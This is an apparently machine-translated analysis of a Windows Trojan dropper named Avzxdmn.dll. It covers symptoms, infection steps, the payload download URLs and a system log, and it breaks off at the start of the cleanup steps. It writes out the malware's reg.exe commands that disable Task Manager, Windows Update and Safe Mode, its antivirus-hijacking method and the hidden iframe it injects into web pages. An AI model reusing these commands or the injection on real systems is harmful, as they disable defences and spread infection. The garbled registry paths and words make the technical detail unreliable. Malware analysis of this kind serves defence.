Avzxdmn. dll virus poisoning symptoms:
Recently, many people have known this "animal" virus. It is called the "animal" virus because after the virus runs, in the folder option, the text of the hidden file is changed to "the animal is still a little pity, and I have no, so I am not a beast."
This virus is actually the original niu.exe variant, but this variant has greatly increased many new "functions", and the system will be completely unprotected with the help of animal viruses and other Trojans. there is almost no chance of saving the system without any tools
Avzxdmn. dll virus:
1. Disable some system self-protection functions (automatic update, firewall, etc.) in security mode)
2. IFEO image hijacking anti-virus software and common security tools
3. Disable Task Manager
4. Modify the Home Page
5. Close the window with the words "Antivirus"
6. Infected html and other webpage files
7. Delete the gho file so that the user cannot restore the system
8. USB flash drive
9. Download a variety of Trojans and rogue software (up to 20 Trojans)
Avzxdmn. dll virus analysis:
1. Release the following files:
%System321_crsss.exe
Autorun. inf and niu.exe are generated under each partition.
2.call reg.exe to perform the following operations:
Add your own startup project
ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun/V crsss/T REG_SZ/D
Disable windows automatic update
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate/v DisableWindowsUpdateAccess/t REG_dword/d 00000001/f
Disable Task Manager
Add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem/v DisableTaskMgr/t REG_dword/d 00000001/f
Damage the hidden file and change the option name to "the animal is still a little pity, and I have no,
So I am not an animal"
Delete hklmsoftwaremicrosoftwindowscurrentversionpoliceradvancedfolderhiddenshowall/f
Add hklmsoftwaremicrosoftwindowscurrentversioninclueradvancedfolderhiddennohidden/v Text/t REG_SZ/d the animal is still a little pity, and I have no, so I am not a beast./f
Sabotage Security Mode
Delete HKLMSYSTEMControlSet001ControlSafeBootMinimal {4D36E967-E325-11CE-BFC1-08002BE10318}/f
Delete HKLMSYSTEMControlSet001ControlSafeBootNetwork {4D36E967-E325-11CE-BFC1-08002BE10318}/f
Delete HKLMSYSTEMCurrentControlSetControlSafeBootMinimal {4D36E967-E325-11CE-BFC1-08002BE10318}/f
Delete HKLMSYSTEMCurrentControlSetControlSafeBootNetwork {4D36E967-E325-11CE-BFC1-08002BE10318}/f
3. Go to HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution options. for example, for the image hijacking project, refer to system321_crsss.exe (Due to space limitations, only textures)
Besides hijacking common anti-virus software and gadgets, attackers also hijack common auxiliary tools such as msconfig.exe regedit.exe.
4. Traverse each partition and delete the. GHO file.
5. traverse the INDEX. ASP,. HTM, INDEX. PHP, DEFAULT. ASP, DEFAULT. PHP, And CONN. ASP files of each partition.
Add the <IfrAmE src = http://www.1030829.com/0.htm width = 0
Height = 0> </IfrAmE> code
Connect to the network
6. Connect to hxxp: // www.1030829.com/pu/tj.aspfor infection statistics
7. Download hxxp: // * .1030829.com/guanjian.txtto unzip system321_ext1.txt
Read the file content.
And use GetWindowTextA and other functions to obtain the window name. Call PostMessageA to send the WM_CLOSE command.
Close the window with the keyword contained in text1.txt
The content of text1.txt in the test is as follows:
Trojan
Virus
360
Rising
Card
Kingsoft
Drug overlord
Jiang Ming
8. Download hxxp: // * .1030829.com/suoding.txtto unzip system321_d.txt
Read the content (which is a Web site)
And use reg.exe for execution.
Add "HKCUSoftwareMicrosoftInternet assumermain"/v "Start Page"/t REG_EXPAND_SZ/d
To change the IE homepage to the address in d.txt.
Add "HKCUSoftwarePoliciesMicrosoftInternet javasercontrol Panel"/v "HomePage"/t REG_DWORD/d 00000001/f lock IE HomePage
In the test, the content in suoding.txt is www.baidu.com (it will certainly change later)
9. DownloadHttp: // * .1030829.com/down.txtto the folder system32.pdf
Read the address and download the Trojan.
Http: // * .1030829.com/tempA.exe ~ Http://w.1030829.com/tempW.exe
To the % system32 % folder
Trojan horses may steal accounts and passwords of the following games (including but not limited)
Sword
World of Warcraft
Miracle world
Perfect World
Westward journey II
Magic domain
Question
Zhu Xian
Hot blood
QQ
...
The sreng log after Trojan implantation is as follows:
Start the project
Registry
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<Crsss> <C: WINDOWSsystem32crsss.exe> [N/A]
<Upxdnd> <C: WINDOWSupxdnd.exe> []
<KVP> <C: WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
NTCurrentVersionWindows]
<AppInit_DLLs> <rarjbpi. dll> []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
NTCurrentVersionWinlogon]
<UIHost> <logonui.exe> [(Verified) Microsoft Windows Publisher]
[Hkey_local_machinesoftwaremicrosoftwindowscurrentversionpolicershellexecutehooks]
<{4D47B341-43DF-4563-753F-345FFA3157D4}> <C: WINDOWSsystem32
Kvmxdma. dll> []
<{3e32fa58-3453-fa2d-bc49-f340348acpushed}> <C: WINDOWSsystem32
Smycpm. dll> []
<{3c87a354-abc3-de-ff33-3213fd7447c3}> <C: WINDOWSsystem32
Kvdxcma. dll> []
<{3a1247c1-53366ff43-abd3-345f323a48d3}> <C: WINDOWSsystem32
Avwgcen. dll> []
<{46650011-3344-6688-4899-345FABCD1564}> <C: WINDOWSsystem32
Atbdpi. dll> []
<{14783410-4F90-34A0-7820-3230ACD05F41}> <C: WINDOWSsystem32
Aqjapi. dll> []
<{22faacde-34213ccd4-ab4d-da34485a3422}> <C: WINDOWSsystem32
Sjzbpm. dll> []
<{4859245F-345D-BC13-AC4F-145D47DA34F4}> <C: WINDOWSsystem32
Avzxdmn. dll> []
<{28907901-1416-3389-9981-372178569982}> <C: WINDOWSsystem32
Kawdbzy. dll> []
<{2598FF45-DA60-F48A-BC43-10AC47853D52}> <C: WINDOWSsystem32
Arjbpi. dll> []
<{1AB09B3F-A6D0-4B55-B87D-264934EBEAED}> <C: Program FilesInternet
Assumerpluginswinsys74.sys> []
<{A393C2CF-1C26-4309-9765-13B7FDC0F200}> <C: WINDOWSsystem32
Mypern0.dll> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage
File Execution Options360rpt.exe]
<Ifeo1_360rpt.exe]> <C: WINDOWSsystem32crsss.exe> [N/A]...
========================================
Service
[Windows dvne RunThem/dvne] [Running/Auto Start]
<C: WINDOWSSystem32svchost.exe-k netsvcs --> C: PROGRA ~ 1
Yqiziasj. dll> <>
========================================
Driver
[Acpidisk/acpidisk] [Running/Auto Start]
<?? C: WINDOWSsystem32driversacpidisk. sys> <N/A>
========================================
Running Process
[PID: 1756] [C: WINDOWSExplorer. EXE] [Microsoft Corporation,
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C: WINDOWSsystem32arjbpi. dll] [N/A,]
[C: WINDOWSsystem32kvmxdma. dll] [N/A,]
[C: WINDOWSsystem32smycpm. dll] [N/A,]
[C: WINDOWSsystem32kvdxcma. dll] [N/A,]
[C: windowssystem32avwgcen. dll] [N/A,]
[C: WINDOWSsystem32atbdpi. dll] [N/A,]
[C: WINDOWSsystem32aqjapi. dll] [N/A,]
[C: WINDOWSsystem32sjzbpm. dll] [N/A,]
[C: WINDOWSsystem32avzxdmn. dll] [N/A,]
[C: WINDOWSsystem32kawdbzy. dll] [N/A,]
[C: Program FilesInternet assumerpluginswinsys74.sys] [N/A,]
[C: WINDOWSsystem32mypern0. dll] [N/A,]
[C: WINDOWSsystem32upxdnd. dll] [N/A,]
[C: progra ~ 1yqizldvm. dll] [, 5, 0, 1, 1]
[C: progra ~ 1yqizqiar. dll] [, 5, 0, 1, 1]
========================================
Winsock provider
MSAPI Tcpip [TCP/IP]
C: WINDOWSsystem32msavp. dll (, N/)
MSAPI Tcpip [UDP/IP]
C: WINDOWSsystem32msavp. dll (, N/)
...
Avzxdmn. dll virus cleanup method:
1. Clear the virus main program
Download sreng2.zipand icesword120_cn.zip (hereinafter referred to as ice blade)
1. Decompress IceSword122